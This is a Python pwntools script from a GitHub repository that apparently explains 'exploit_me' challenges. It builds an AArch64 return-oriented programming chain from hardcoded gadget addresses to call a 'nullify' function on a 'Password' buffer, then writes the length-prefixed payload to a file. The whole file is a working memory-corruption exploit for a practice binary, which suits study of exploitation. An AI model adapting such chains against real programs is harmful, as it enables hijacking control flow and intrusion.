exploit_me_explain/gadget_nullify_v2.py at main · rizutazu/exploit_me_explain · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
from pwn import *

addr_jmpgadget = 0x400758
addr_setx0 = 0x468230
addr_setx1x3_jx3 = 0x41257c
addr_callx1_setx19 = 0x45bd08
addr_setx2x3 = 0x400748
addr_addx0x1 = 0x40de1c
addr_movx1sp_x0x19_jx2 = 0x428c48
addr_setx19x20 = 0x42cb10
addr_subx0x20_setx19x20 = 0x429b6c
addr_savex0 = 0x400734
addr_addx1x0_savex1_setx21x22 = 0x4296d0
addr_setx21 = 0x46a96c
addr_spadd48 = 0x428674

stack_offset = 488

addr_Password = 0x4afcb0
addr_nullify = 0x400e88
addr_exit = 0x417b30

def setx0(x0, ret):
    c = b''
    c += b'a' * 8
    c += p64(ret)
    c += b'b' * 112
    c += p64(x0)
    c += b'c' * 40
    return c

def setx1x3_jx3(x1, x3):
    c = b''
    c += b'e' * 112
    c += p64(x1)  # x1 of setx1x3_jx3
    c += p64(x3) # x3 of setx1x3_jx3
    # }
    return c

def setx2x3(x2, x3, ret):
    b = b''
    b += p64(x2)
    b += p64(x3)
    b += b'f' * 8
    b += p64(ret)
    b += b'g' * 16

    return b

def addx0x1(ret):

    b = b'h' * 8
    b += p64(ret)

    return b

def subx0x20_setx19x20(x19, x20, ret):
    b = b'i' * 8
    b += p64(ret)
    b += p64(x19)
    b += p64(x20)
    b += b'j' * 16

    return b

def setx19x20(x19, x20, ret):
    b = b'k' * 8
    b += p64(ret)
    b += p64(x19)
    b += p64(x20)

    return b

def addx1x0_savex1_setx21x22(x21, x22, ret):

    b = b'l' * 8
    b += p64(ret)
    b += b'm' * 16
    b += p64(x21)
    b += p64(x22)
    return b

def setx21(x21, ret):
    b = b'n' * 8
    b += p64(ret)
    b += b'o' * 16
    b += p64(x21)
    b += b'p' * 8
    return b

def savex0(ret):
    b = b'q' * 8
    b += p64(ret)
    return b

# jmpgadget stack baseline - 0x28
c = b'a' * 8 + b'b' * 8 + p64(addr_spadd48) + b'c' * 8   #x0 x1 x2 x3

# spadd48 stack baseline
c += b'd' * 8
c += p64(addr_setx2x3)
c += p64(addr_jmpgadget)
c += b'e' * 24

# setx2x3 stack baseline
c += setx2x3(x2=addr_setx0, x3=114514, ret=addr_movx1sp_x0x19_jx2)
# movx1sp_x0x19_jx2
c += setx0(x0=stack_offset, ret=addr_setx21)
c += setx21(x21=addr_Password-144, ret=addr_addx1x0_savex1_setx21x22)
c += addx1x0_savex1_setx21x22(x21=114514, x22=114514, ret=addr_setx0)
c += setx0(x0=0, ret=addr_addx0x1)
c += addx0x1(ret=addr_setx19x20)
c += setx19x20(x19=114514, x20=4, ret=addr_subx0x20_setx19x20)
c += subx0x20_setx19x20(x19=114514, x20=114514, ret=addr_savex0)
c += savex0(ret=addr_setx1x3_jx3)
c += setx1x3_jx3(x1=1, x3=addr_nullify)

length = len(c)

filename = b'\xfd\x7b\xbe\xa9\xc0\x04'

with open(filename, "wb+") as f:
    first = p32(length)
    second = c
    n = f.write(first)
    print(n, first)
    n = f.write(second)
    print(n, second)